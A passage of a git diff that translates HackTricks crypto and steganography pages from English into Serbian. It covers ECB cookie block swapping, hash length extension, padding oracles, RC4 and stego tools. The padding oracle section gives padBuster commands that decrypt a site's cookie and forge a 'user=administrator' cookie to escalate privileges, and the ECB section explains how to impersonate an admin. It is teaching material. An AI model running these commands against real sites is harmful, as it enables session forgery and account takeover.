+- Zatim, generisati lozinku koja će popuniti tačan broj blokova koji sadrže korisničko ime koje želimo da lažno predstavimo i razmake, kao što je: `admin   `
 
-- Generate a username that: `len() + len(` will generate 2 blocks of 8Bs.
-- Then, generate a password that will fill an exact number of blocks containing the username we want to impersonate and spaces, like: `admin   `
+Kolačić ovog korisnika će se sastojati od 3 bloka: prva 2 su blokovi korisničkog imena + delimiter, a treći je lozinka (koja lažno predstavlja korisničko ime): `username       |admin   `
 
-The cookie of this user is going to be composed by 3 blocks: the first 2 is the blocks of the username + delimiter and the third one of the password (which is faking the username): `username       |admin   `
+**Zatim, samo zamenite prvi blok sa poslednjim i lažno ćete predstavljati korisnika `admin`: `admin          |username`**
 
-**Then, just replace the first block with the last time and will be impersonating the user `admin`: `admin          |username`**
-
-## References
+## Reference
 
 - [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)]()
 
diff --git a/src/crypto-and-stego/esoteric-languages.md b/src/crypto-and-stego/esoteric-languages.md
index 2faf6564f..8051496e7 100644
--- a/src/crypto-and-stego/esoteric-languages.md
+++ b/src/crypto-and-stego/esoteric-languages.md
@@ -1,18 +1,16 @@
-# Esoteric languages
+# Esoterične jezike
 
 {{#include ../banners/hacktricks-training.md}}
 
 ## [Esolangs Wiki](https://esolangs.org/wiki/Main_Page)
 
-Check that wiki to search more esotreic languages
+Proverite tu viki da biste pronašli više esoteričnih jezika
 
 ## Malbolge
-
 ```
 ('&%:9]!~}|z2Vxwv-,POqponl$Hjig%eB@@>}=
 ```
-
 [http://malbolge.doleczek.pl/](http://malbolge.doleczek.pl)
 
 ## npiet
@@ -22,7 +20,6 @@ Check that wiki to search more esotreic languages
 [https://www.bertnase.de/npiet/npiet-execute.php](https://www.bertnase.de/npiet/npiet-execute.php)
 
 ## Rockstar
-
 ```
 Midnight takes your heart and your soul
 While your heart is as high as your soul
@@ -51,11 +48,9 @@ Take it to the top
 
 Whisper my world
 ```
-
 {% embed url="https://codewithrockstar.com/" %}
 
 ## PETOOH
-
 ```
 KoKoKoKoKoKoKoKoKoKo Kud-Kudah
 KoKoKoKoKoKoKoKo kudah kO kud-Kudah Kukarek kudah
@@ -65,5 +60,4 @@ KoKoKoKo Kud-Kudah KoKoKoKo kudah kO kud-Kudah kO Kukarek
 kOkOkOkOkO Kukarek Kukarek kOkOkOkOkOkOkO
 Kukarek
 ```
-
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/crypto-and-stego/hash-length-extension-attack.md b/src/crypto-and-stego/hash-length-extension-attack.md
index 51a38df3f..5bb47557d 100644
--- a/src/crypto-and-stego/hash-length-extension-attack.md
+++ b/src/crypto-and-stego/hash-length-extension-attack.md
@@ -2,37 +2,37 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Summary of the attack
+## Sažetak napada
 
-Imagine a server which is **signing** some **data** by **appending** a **secret** to some known clear text data and then hashing that data. If you know:
+Zamislite server koji **potpisuje** neke **podatke** tako što **dodaje** **tajnu** nekim poznatim čistim tekstualnim podacima i zatim hešira te podatke. Ako znate:
 
-- **The length of the secret** (this can be also bruteforced from a given length range)
-- **The clear text data**
-- **The algorithm (and it's vulnerable to this attack)**
-- **The padding is known**
-  - Usually a default one is used, so if the other 3 requirements are met, this also is
-  - The padding vary depending on the length of the secret+data, that's why the length of the secret is needed
+- **Dužinu tajne** (to se može takođe bruteforcovati iz datog opsega dužine)
+- **Čiste tekstualne podatke**
+- **Algoritam (i da je podložan ovom napadu)**
+- **Padding je poznat**
+- Obično se koristi podrazumevani, tako da ako su ispunjena druga 3 zahteva, ovo takođe važi
+- Padding varira u zavisnosti od dužine tajne + podataka, zato je dužina tajne potrebna
 
-Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previous data + appended data**.
+Tada je moguće da **napadač** **doda** **podatke** i **generiše** važeći **potpis** za **prethodne podatke + dodate podatke**.
 
-### How?
+### Kako?
 
-Basically the vulnerable algorithms generate the hashes by firstly **hashing a block of data**, and then, **from** the **previously** created **hash** (state), they **add the next block of data** and **hash it**.
+U suštini, ranjivi algoritmi generišu heš tako što prvo **heširaju blok podataka**, a zatim, **iz** **prethodno** kreiranog **heša** (stanja), **dodaju sledeći blok podataka** i **heširaju ga**.
 
-Then, imagine that the secret is "secret" and the data is "data", the MD5 of "secretdata" is 6036708eba0d11f6ef52ad44e8b74d5b.\
-If an attacker wants to append the string "append" he can:
+Zamislite da je tajna "secret" a podaci su "data", MD5 od "secretdata" je 6036708eba0d11f6ef52ad44e8b74d5b.\
+Ako napadač želi da doda string "append" može:
 
-- Generate a MD5 of 64 "A"s
-- Change the state of the previously initialized hash to 6036708eba0d11f6ef52ad44e8b74d5b
-- Append the string "append"
-- Finish the hash and the resulting hash will be a **valid one for "secret" + "data" + "padding" + "append"**
+- Generisati MD5 od 64 "A"
+- Promeniti stanje prethodno inicijalizovanog heša na 6036708eba0d11f6ef52ad44e8b74d5b
+- Dodati string "append"
+- Završiti heš i rezultantni heš će biti **važeći za "secret" + "data" + "padding" + "append"**
 
-### **Tool**
+### **Alat**
 
 {% embed url="https://github.com/iagox86/hash_extender" %}
 
-### References
+### Reference
 
-You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
+Ovaj napad je dobro objašnjen na [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/crypto-and-stego/padding-oracle-priv.md b/src/crypto-and-stego/padding-oracle-priv.md
index 96d3145a3..274b6f26c 100644
--- a/src/crypto-and-stego/padding-oracle-priv.md
+++ b/src/crypto-and-stego/padding-oracle-priv.md
@@ -2,26 +2,24 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-{% embed url="https://websec.nl/" %}
-
 ## CBC - Cipher Block Chaining
 
-In CBC mode the **previous encrypted block is used as IV** to XOR with the next block:
+U CBC modu **prethodni enkriptovani blok se koristi kao IV** za XOR sa sledećim blokom:
 
 ![https://defuse.ca/images/cbc_encryption.png](https://defuse.ca/images/cbc_encryption.png)
 
-To decrypt CBC the **opposite** **operations** are done:
+Da bi se dekriptovao CBC, vrše se **suprotne** **operacije**:
 
 ![https://defuse.ca/images/cbc_decryption.png](https://defuse.ca/images/cbc_decryption.png)
 
-Notice how it's needed to use an **encryption** **key** and an **IV**.
+Primetite da je potrebno koristiti **ključ za enkripciju** i **IV**.
 
 ## Message Padding
 
-As the encryption is performed in **fixed** **size** **blocks**, **padding** is usually needed in the **last** **block** to complete its length.\
-Usually **PKCS7** is used, which generates a padding **repeating** the **number** of **bytes** **needed** to **complete** the block. For example, if the last block is missing 3 bytes, the padding will be `\x03\x03\x03`.
+Kako se enkripcija vrši u **fiksnim** **veličinama** **blokova**, obično je potrebno **paddovanje** u **poslednjem** **bloku** da bi se završila njegova dužina.\
+Obično se koristi **PKCS7**, koji generiše padding **ponavljajući** **broj** **bajtova** **potrebnih** da se **završi** blok. Na primer, ako poslednjem bloku nedostaje 3 bajta, padding će biti `\x03\x03\x03`.
 
-Let's look at more examples with a **2 blocks of length 8bytes**:
+Pogledajmo više primera sa **2 bloka dužine 8 bajtova**:
 
 | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | byte #0  | byte #1  | byte #2  | byte #3  | byte #4  | byte #5  | byte #6  | byte #7  |
 | ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- |
@@ -30,51 +28,43 @@ Let's look at more examples with a **2 blocks of length 8bytes**:
 | P       | A       | S       | S       | W       | O       | R       | D       | 1        | 2        | 3        | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** |
 | P       | A       | S       | S       | W       | O       | R       | D       | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** |
 
-Note how in the last example the **last block was full so another one was generated only with padding**.
+Primetite kako je u poslednjem primeru **poslednji blok bio pun pa je generisan još jedan samo sa paddingom**.
 
 ## Padding Oracle
 
-When an application decrypts encrypted data, it will first decrypt the data; then it will remove the padding. During the cleanup of the padding, if an **invalid padding triggers a detectable behaviour**, you have a **padding oracle vulnerability**. The detectable behaviour can be an **error**, a **lack of results**, or a **slower response**.
+Kada aplikacija dekriptuje enkriptovane podatke, prvo će dekriptovati podatke; zatim će ukloniti padding. Tokom čišćenja paddinga, ako **nevalidan padding izazove uočljivo ponašanje**, imate **padding oracle ranjivost**. Uočljivo ponašanje može biti **greška**, **nedostatak rezultata**, ili **sporiji odgovor**.
 
-If you detect this behaviour, you can **decrypt the encrypted data** and even **encrypt any cleartext**.
+Ako primetite ovo ponašanje, možete **dekriptovati enkriptovane podatke** i čak **enkriptovati bilo koji čist tekst**.
 
-### How to exploit
-
-You could use [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) to exploit this kind of vulnerability or just do
+### Kako iskoristiti
 
+Možete koristiti [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) da iskoristite ovu vrstu ranjivosti ili samo uraditi
 ```
 sudo apt-get install padbuster
 ```
-
-In order to test if the cookie of a site is vulnerable you could try:
-
+Da biste testirali da li je kolačić sajta ranjiv, možete pokušati:
 ```bash
 perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA=="
 ```
+**Encoding 0** znači da se koristi **base64** (ali su dostupni i drugi, proverite meni pomoći).
 
-**Encoding 0** means that **base64** is used (but others are available, check the help menu).
-
-You could also **abuse this vulnerability to encrypt new data. For example, imagine that the content of the cookie is "**_**user=MyUsername**_**", then you may change it to "\_user=administrator\_" and escalate privileges inside the application. You could also do it using `paduster`specifying the -plaintext** parameter:
-
+Takođe možete **iskoristiti ovu ranjivost za enkripciju novih podataka. Na primer, zamislite da je sadržaj kolačića "**_**user=MyUsername**_**", tada ga možete promeniti u "\_user=administrator\_" i povećati privilegije unutar aplikacije. Takođe to možete uraditi koristeći `paduster`specifikujući -plaintext** parametar:
 ```bash
 perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator"
 ```
-
-If the site is vulnerable `padbuster`will automatically try to find when the padding error occurs, but you can also indicating the error message it using the **-error** parameter.
-
+Ako je sajt ranjiv, `padbuster` će automatski pokušati da pronađe kada se javlja greška u punjenju, ali takođe možete naznačiti poruku o grešci koristeći **-error** parametar.
 ```bash
 perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding"
 ```
+### Teorija
 
-### The theory
-
-In **summary**, you can start decrypting the encrypted data by guessing the correct values that can be used to create all the **different paddings**. Then, the padding oracle attack will start decrypting bytes from the end to the start by guessing which will be the correct value that **creates a padding of 1, 2, 3, etc**.
+U **sažetku**, možete početi dekriptovanje enkriptovanih podataka pogađanjem ispravnih vrednosti koje se mogu koristiti za kreiranje svih **različitih paddinga**. Tada će napad padding oracle početi dekriptovanje bajtova od kraja ka početku pogađajući koja će biti ispravna vrednost koja **stvara padding od 1, 2, 3, itd**.
 
 ![](<../images/image (561).png>)
 
-Imagine you have some encrypted text that occupies **2 blocks** formed by the bytes from **E0 to E15**.\
-In order to **decrypt** the **last** **block** (**E8** to **E15**), the whole block passes through the "block cipher decryption" generating the **intermediary bytes I0 to I15**.\
-Finally, each intermediary byte is **XORed** with the previous encrypted bytes (E0 to E7). So:
+Zamislite da imate neki enkriptovani tekst koji zauzima **2 bloka** formirana bajtovima od **E0 do E15**.\
+Da biste **dekriptovali** **poslednji** **blok** (**E8** do **E15**), ceo blok prolazi kroz "dekriptovanje blok cifre" generišući **intermedijarne bajtove I0 do I15**.\
+Na kraju, svaki intermedijarni bajt se **XOR-uje** sa prethodnim enkriptovanim bajtovima (E0 do E7). Tako:
 
 - `C15 = D(E15) ^ E7 = I15 ^ E7`
 - `C14 = I14 ^ E6`
@@ -82,31 +72,30 @@ Finally, each intermediary byte is **XORed** with the previous encrypted bytes (
 - `C12 = I12 ^ E4`
 - ...
 
-Now, It's possible to **modify `E7` until `C15` is `0x01`**, which will also be a correct padding. So, in this case: `\x01 = I15 ^ E'7`
+Sada, moguće je **modifikovati `E7` dok `C15` ne bude `0x01`**, što će takođe biti ispravan padding. Dakle, u ovom slučaju: `\x01 = I15 ^ E'7`
 
-So, finding E'7, it's **possible to calculate I15**: `I15 = 0x01 ^ E'7`
+Dakle, pronalaženjem E'7, **moguće je izračunati I15**: `I15 = 0x01 ^ E'7`
 
-Which allow us to **calculate C15**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7`
+Što nam omogućava da **izračunamo C15**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7`
 
-Knowing **C15**, now it's possible to **calculate C14**, but this time brute-forcing the padding `\x02\x02`.
+Znajući **C15**, sada je moguće **izračunati C14**, ali ovaj put brute-forcing padding `\x02\x02`.
 
-This BF is as complex as the previous one as it's possible to calculate the the `E''15` whose value is 0x02: `E''7 = \x02 ^ I15` so it's just needed to find the **`E'14`** that generates a **`C14` equals to `0x02`**.\
-Then, do the same steps to decrypt C14: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`**
+Ovaj BF je jednako složen kao prethodni jer je moguće izračunati `E''15` čija je vrednost 0x02: `E''7 = \x02 ^ I15` tako da je samo potrebno pronaći **`E'14`** koji generiše **`C14` jednako `0x02`**.\
+Zatim, uradite iste korake da dekriptujete C14: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`**
 
-**Follow this chain until you decrypt the whole encrypted text.**
+**Pratite chain dok ne dekriptujete ceo enkriptovani tekst.**
 
-### Detection of the vulnerability
+### Detekcija ranjivosti
 
-Register and account and log in with this account .\
-If you **log in many times** and always get the **same cookie**, there is probably **something** **wrong** in the application. The **cookie sent back should be unique** each time you log in. If the cookie is **always** the **same**, it will probably always be valid and there **won't be anyway to invalidate i**t.
+Registrujte se i prijavite sa ovim nalogom.\
+Ako se **prijavljujete više puta** i uvek dobijate **isti cookie**, verovatno postoji **nešto** **pogrešno** u aplikaciji. **Cookie koji se vraća treba da bude jedinstven** svaki put kada se prijavite. Ako je cookie **uvek** **isti**, verovatno će uvek biti važeći i neće biti načina da se **poništi**.
 
-Now, if you try to **modify** the **cookie**, you can see that you get an **error** from the application.\
-But if you BF the padding (using padbuster for example) you manage to get another cookie valid for a different user. This scenario is highly probably vulnerable to padbuster.
+Sada, ako pokušate da **modifikujete** **cookie**, možete videti da dobijate **grešku** iz aplikacije.\
+Ali ako BF-ujete padding (koristeći padbuster na primer) uspete da dobijete drugi cookie važeći za drugog korisnika. Ovaj scenario je veoma verovatno ranjiv na padbuster.
 
-### References
+### Reference
 
 - [https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation)
 
-{% embed url="https://websec.nl/" %}
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md
index dc89fa296..df4c6bf33 100644
--- a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md
+++ b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md
@@ -1,8 +1,8 @@
 {{#include ../banners/hacktricks-training.md}}
 
-If you can somehow encrypt a plaintext using RC4, you can decrypt any content encrypted by that RC4 (using the same password) just using the encryption function.
+Ako možete na neki način enkriptovati običan tekst koristeći RC4, možete dekriptovati bilo koji sadržaj enkriptovan tim RC4 (koristeći istu lozinku) samo koristeći funkciju enkripcije.
 
-If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine:
+Ako možete enkriptovati poznati običan tekst, možete takođe izvući lozinku. Više referenci možete pronaći na HTB Kryptos mašini:
 
 {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
 
diff --git a/src/crypto-and-stego/stego-tricks.md b/src/crypto-and-stego/stego-tricks.md
index 91ed86406..22f15695c 100644
--- a/src/crypto-and-stego/stego-tricks.md
+++ b/src/crypto-and-stego/stego-tricks.md
@@ -2,50 +2,41 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-## **Extracting Data from Files**
+## **Ekstrakcija podataka iz fajlova**
 
 ### **Binwalk**
 
-A tool for searching binary files for embedded hidden files and data. It's installed via `apt` and its source is available on [GitHub](https://github.com/ReFirmLabs/binwalk).
-
+Alat za pretragu binarnih fajlova za ugrađene skrivene fajlove i podatke. Instalira se putem `apt` i njegov izvor je dostupan na [GitHub](https://github.com/ReFirmLabs/binwalk).
 ```bash
 binwalk file # Displays the embedded data
 binwalk -e file # Extracts the data
 binwalk --dd ".*" file # Extracts all data
 ```
-
 ### **Foremost**
 
-Recovers files based on their headers and footers, useful for png images. Installed via `apt` with its source on [GitHub](https://github.com/korczis/foremost).
-
+Obnavlja fajlove na osnovu njihovih zaglavlja i podnožja, korisno za png slike. Instalira se putem `apt` sa svojim izvorom na [GitHub](https://github.com/korczis/foremost).
 ```bash
 foremost -i file # Extracts data
 ```
-
 ### **Exiftool**
 
-Helps to view file metadata, available [here](https://www.sno.phy.queensu.ca/~phil/exiftool/).
-
+Pomaže u prikazivanju metapodataka datoteka, dostupno [here](https://www.sno.phy.queensu.ca/~phil/exiftool/).
 ```bash
 exiftool file # Shows the metadata
 ```
-
 ### **Exiv2**
 
-Similar to exiftool, for metadata viewing. Installable via `apt`, source on [GitHub](https://github.com/Exiv2/exiv2), and has an [official website](http://www.exiv2.org/).
-
+Slično exiftool-u, za pregled metapodataka. Instalira se putem `apt`, izvor na [GitHub](https://github.com/Exiv2/exiv2), i ima [službenu veb stranicu](http://www.exiv2.org/).
 ```bash
 exiv2 file # Shows the metadata
 ```
+### **Datoteka**
 
-### **File**
+Identifikujte tip datoteke s kojom se bavite.
 
-Identify the type of file you're dealing with.
-
-### **Strings**
-
-Extracts readable strings from files, using various encoding settings to filter the output.
+### **Stringovi**
 
+Izvlači čitljive stringove iz datoteka, koristeći različite postavke kodiranja za filtriranje izlaza.
 ```bash
 strings -n 6 file # Extracts strings with a minimum length of 6
 strings -n 6 file | head -n 20 # First 20 strings
@@ -57,95 +48,84 @@ strings -e b -n 6 file # 16bit strings (big-endian)
 strings -e L -n 6 file # 32bit strings (little-endian)
 strings -e B -n 6 file # 32bit strings (big-endian)
 ```
+### **Poređenje (cmp)**
 
-### **Comparison (cmp)**
-
-Useful for comparing a modified file with its original version found online.
-
+Koristan za poređenje izmenjene datoteke sa njenom originalnom verzijom koja se može pronaći na mreži.
 ```bash
 cmp original.jpg stego.jpg -b -l
 ```
+## **Ekstrakcija Skrivenih Podataka u Tekstu**
 
-## **Extracting Hidden Data in Text**
+### **Skriveni Podaci u Prostorima**
 
-### **Hidden Data in Spaces**
+Nevidljivi karakteri u naizgled praznim prostorima mogu skrivati informacije. Da biste ekstraktovali ove podatke, posetite [https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder](https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder).
 
-Invisible characters in seemingly empty spaces may hide information. To extract this data, visit [https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder](https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder).
+## **Ekstrakcija Podataka iz Slika**
 
-## **Extracting Data from Images**
-
-### **Identifying Image Details with GraphicMagick**
-
-[GraphicMagick](https://imagemagick.org/script/download.php) serves to determine image file types and identify potential corruption. Execute the command below to inspect an image:
+### **Identifikacija Detalja Slike sa GraphicMagick**
 
+[GraphicMagick](https://imagemagick.org/script/download.php) služi za određivanje tipova fajlova slika i identifikaciju potencijalne korupcije. Izvršite komandu ispod da biste pregledali sliku:
 ```bash
 ./magick identify -verbose stego.jpg
 ```
-
-To attempt repair on a damaged image, adding a metadata comment might help:
-
+Da biste pokušali da popravite oštećenu sliku, dodavanje komentara u metapodacima može pomoći:
 ```bash
 ./magick mogrify -set comment 'Extraneous bytes removed' stego.jpg
 ```
+### **Steghide za Sakrivanje Podataka**
 
-### **Steghide for Data Concealment**
+Steghide olakšava skrivanje podataka unutar `JPEG, BMP, WAV, i AU` fajlova, sposoban je za ugrađivanje i vađenje enkriptovanih podataka. Instalacija je jednostavna koristeći `apt`, a njegov [izvorni kod je dostupan na GitHub-u](https://github.com/StefanoDeVuono/steghide).
 
-Steghide facilitates hiding data within `JPEG, BMP, WAV, and AU` files, capable of embedding and extracting encrypted data. Installation is straightforward using `apt`, and its [source code is available on GitHub](https://github.com/StefanoDeVuono/steghide).
+**Komande:**
 
-**Commands:**
+- `steghide info file` otkriva da li fajl sadrži skrivene podatke.
+- `steghide extract -sf file [--passphrase password]` važi skrivene podatke, lozinka je opcionalna.
 
-- `steghide info file` reveals if a file contains hidden data.
-- `steghide extract -sf file [--passphrase password]` extracts the hidden data, password optional.
+Za vađenje putem veba, posetite [ovu veb stranicu](https://futureboy.us/stegano/decinput.html).
 
-For web-based extraction, visit [this website](https://futureboy.us/stegano/decinput.html).
-
-**Bruteforce Attack with Stegcracker:**
-
-- To attempt password cracking on Steghide, use [stegcracker](https://github.com/Paradoxis/StegCracker.git) as follows:
+**Bruteforce Napad sa Stegcracker-om:**
 
+- Da biste pokušali da probijete lozinku na Steghide-u, koristite [stegcracker](https://github.com/Paradoxis/StegCracker.git) na sledeći način:
 ```bash
 stegcracker  []
 ```
+### **zsteg za PNG i BMP fajlove**
 
-### **zsteg for PNG and BMP Files**
+zsteg se specijalizuje za otkrivanje skrivenih podataka u PNG i BMP fajlovima. Instalacija se vrši putem `gem install zsteg`, sa svojim [izvorom na GitHub-u](https://github.com/zed-0xff/zsteg).
 
-zsteg specializes in uncovering hidden data in PNG and BMP files. Installation is done via `gem install zsteg`, with its [source on GitHub](https://github.com/zed-0xff/zsteg).
+**Komande:**
 
-**Commands:**
+- `zsteg -a file` primenjuje sve metode detekcije na fajl.
+- `zsteg -E file` specificira payload za ekstrakciju podataka.
 
-- `zsteg -a file` applies all detection methods on a file.
-- `zsteg -E file` specifies a payload for data extraction.
+### **StegoVeritas i Stegsolve**
 
-### **StegoVeritas and Stegsolve**
+**stegoVeritas** proverava metapodatke, vrši transformacije slika i primenjuje LSB brute forcing među ostalim funkcijama. Koristite `stegoveritas.py -h` za punu listu opcija i `stegoveritas.py stego.jpg` da izvršite sve provere.
 
-**stegoVeritas** checks metadata, performs image transformations, and applies LSB brute forcing among other features. Use `stegoveritas.py -h` for a full list of options and `stegoveritas.py stego.jpg` to execute all checks.
+**Stegsolve** primenjuje razne filtere boja kako bi otkrio skrivene tekstove ili poruke unutar slika. Dostupan je na [GitHub-u](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve).
 
-**Stegsolve** applies various color filters to reveal hidden texts or messages within images. It's available on [GitHub](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve).
+### **FFT za detekciju skrivenog sadržaja**
 
-### **FFT for Hidden Content Detection**
-
-Fast Fourier Transform (FFT) techniques can unveil concealed content in images. Useful resources include:
+Fast Fourier Transform (FFT) tehnike mogu otkriti skrivene sadržaje u slikama. Korisni resursi uključuju:
 
 - [EPFL Demo](http://bigwww.epfl.ch/demo/ip/demos/FFT/)
 - [Ejectamenta](https://www.ejectamenta.com/Fourifier-fullscreen/)
-- [FFTStegPic on GitHub](https://github.com/0xcomposure/FFTStegPic)
+- [FFTStegPic na GitHub-u](https://github.com/0xcomposure/FFTStegPic)
 
-### **Stegpy for Audio and Image Files**
+### **Stegpy za audio i slikovne fajlove**
 
-Stegpy allows embedding information into image and audio files, supporting formats like PNG, BMP, GIF, WebP, and WAV. It's available on [GitHub](https://github.com/dhsdshdhk/stegpy).
+Stegpy omogućava ugrađivanje informacija u slikovne i audio fajlove, podržavajući formate kao što su PNG, BMP, GIF, WebP i WAV. Dostupan je na [GitHub-u](https://github.com/dhsdshdhk/stegpy).
 
-### **Pngcheck for PNG File Analysis**
-
-To analyze PNG files or to validate their authenticity, use:
+### **Pngcheck za analizu PNG fajlova**
 
+Za analizu PNG fajlova ili za validaciju njihove autentičnosti, koristite:
 ```bash
 apt-get install pngcheck
 pngcheck stego.png
 ```
+### **Dodatni alati za analizu slika**
 
-### **Additional Tools for Image Analysis**
-
-For further exploration, consider visiting:
+Za dalju istraživanje, razmotrite posetu:
 
 - [Magic Eye Solver](http://magiceye.ecksdee.co.uk/)
 - [Image Error Level Analysis](https://29a.ch/sandbox/2012/imageerrorlevelanalysis/)
@@ -153,66 +133,60 @@ For further exploration, consider visiting:
 - [OpenStego](https://www.openstego.com/)
 - [DIIT](https://diit.sourceforge.net/)
 
-## **Extracting Data from Audios**
+## **Ekstrakcija podataka iz audio zapisa**
 
-**Audio steganography** offers a unique method to conceal information within sound files. Different tools are utilized for embedding or retrieving hidden content.
+**Audio steganografija** nudi jedinstvenu metodu za skrivanje informacija unutar zvučnih datoteka. Različiti alati se koriste za umetanje ili preuzimanje skrivenog sadržaja.
 
 ### **Steghide (JPEG, BMP, WAV, AU)**
 
-Steghide is a versatile tool designed for hiding data in JPEG, BMP, WAV, and AU files. Detailed instructions are provided in the [stego tricks documentation](stego-tricks.md#steghide).
+Steghide je svestran alat dizajniran za skrivanje podataka u JPEG, BMP, WAV i AU datotekama. Detaljna uputstva su dostupna u [stego tricks dokumentaciji](stego-tricks.md#steghide).
 
 ### **Stegpy (PNG, BMP, GIF, WebP, WAV)**
 
-This tool is compatible with a variety of formats including PNG, BMP, GIF, WebP, and WAV. For more information, refer to [Stegpy's section](stego-tricks.md#stegpy-png-bmp-gif-webp-wav).
+Ovaj alat je kompatibilan sa raznim formatima uključujući PNG, BMP, GIF, WebP i WAV. Za više informacija, pogledajte [Stegpy-evu sekciju](stego-tricks.md#stegpy-png-bmp-gif-webp-wav).
 
 ### **ffmpeg**
 
-ffmpeg is crucial for assessing the integrity of audio files, highlighting detailed information and pinpointing any discrepancies.
-
+ffmpeg je ključan za procenu integriteta audio datoteka, ističući detaljne informacije i ukazujući na bilo kakve nesuglasice.
 ```bash
 ffmpeg -v info -i stego.mp3 -f null -
 ```
-
 ### **WavSteg (WAV)**
 
-WavSteg excels in concealing and extracting data within WAV files using the least significant bit strategy. It is accessible on [GitHub](https://github.com/ragibson/Steganography#WavSteg). Commands include:
-
+WavSteg se odlično snalazi u skrivanju i vađenju podataka unutar WAV fajlova koristeći strategiju najmanje značajnog bita. Dostupan je na [GitHub](https://github.com/ragibson/Steganography#WavSteg). Komande uključuju:
 ```bash
 python3 WavSteg.py -r -b 1 -s soundfile -o outputfile
 
 python3 WavSteg.py -r -b 2 -s soundfile -o outputfile
 ```
-
 ### **Deepsound**
 
-Deepsound allows for the encryption and detection of information within sound files using AES-256. It can be downloaded from [the official page](http://jpinsoft.net/deepsound/download.aspx).
+Deepsound omogućava enkripciju i detekciju informacija unutar zvučnih fajlova koristeći AES-256. Može se preuzeti sa [zvanične stranice](http://jpinsoft.net/deepsound/download.aspx).
 
 ### **Sonic Visualizer**
 
-An invaluable tool for visual and analytical inspection of audio files, Sonic Visualizer can unveil hidden elements undetectable by other means. Visit the [official website](https://www.sonicvisualiser.org/) for more.
+Neprocenjiv alat za vizuelnu i analitičku inspekciju audio fajlova, Sonic Visualizer može otkriti skrivene elemente koji su nevidljivi drugim sredstvima. Posetite [zvaničnu veb stranicu](https://www.sonicvisualiser.org/) za više informacija.
 
 ### **DTMF Tones - Dial Tones**
 
-Detecting DTMF tones in audio files can be achieved through online tools such as [this DTMF detector](https://unframework.github.io/dtmf-detect/) and [DialABC](http://dialabc.com/sound/detect/index.html).
+Detekcija DTMF tonova u audio fajlovima može se postići putem online alata kao što su [ovaj DTMF detektor](https://unframework.github.io/dtmf-detect/) i [DialABC](http://dialabc.com/sound/detect/index.html).
 
 ## **Other Techniques**
 
 ### **Binary Length SQRT - QR Code**
 
-Binary data that squares to a whole number might represent a QR code. Use this snippet to check:
-
+Binarni podaci koji se kvadriraju u celoj broju mogu predstavljati QR kod. Koristite ovaj isječak za proveru:
 ```python
 import math
 math.sqrt(2500) #50
 ```
+Za konverziju binarnih podataka u sliku, proverite [dcode](https://www.dcode.fr/binary-image). Da biste pročitali QR kodove, koristite [ovaj online čitač barkodova](https://online-barcode-reader.inliteresearch.com/).
 
-For binary to image conversion, check [dcode](https://www.dcode.fr/binary-image). To read QR codes, use [this online barcode reader](https://online-barcode-reader.inliteresearch.com/).
+### **Prevod na Brajlu**
 
-### **Braille Translation**
+Za prevođenje Brajla, [Branah Braille Translator](https://www.branah.com/braille-translator) je odličan resurs.
 
-For translating Braille, the [Branah Braille Translator](https://www.branah.com/braille-translator) is an excellent resource.
-
-## **References**
+## **Reference**
 
 - [**https://0xrick.github.io/lists/stego/**](https://0xrick.github.io/lists/stego/)
 - [**https://github.com/DominicBreuker/stego-toolkit**](https://github.com/DominicBreuker/stego-toolkit)
diff --git a/src/cryptography/certificates.md b/src/cryptography/certificates.md
index 622b48c61..f12a29600 100644
--- a/src/cryptography/certificates.md
+++ b/src/cryptography/certificates.md
@@ -1,47 +1,38 @@
-# Certificates
+# Sertifikati
 
 {{#include ../banners/hacktricks-training.md}}
 
-

+## Šta je Sertifikat
 
-\
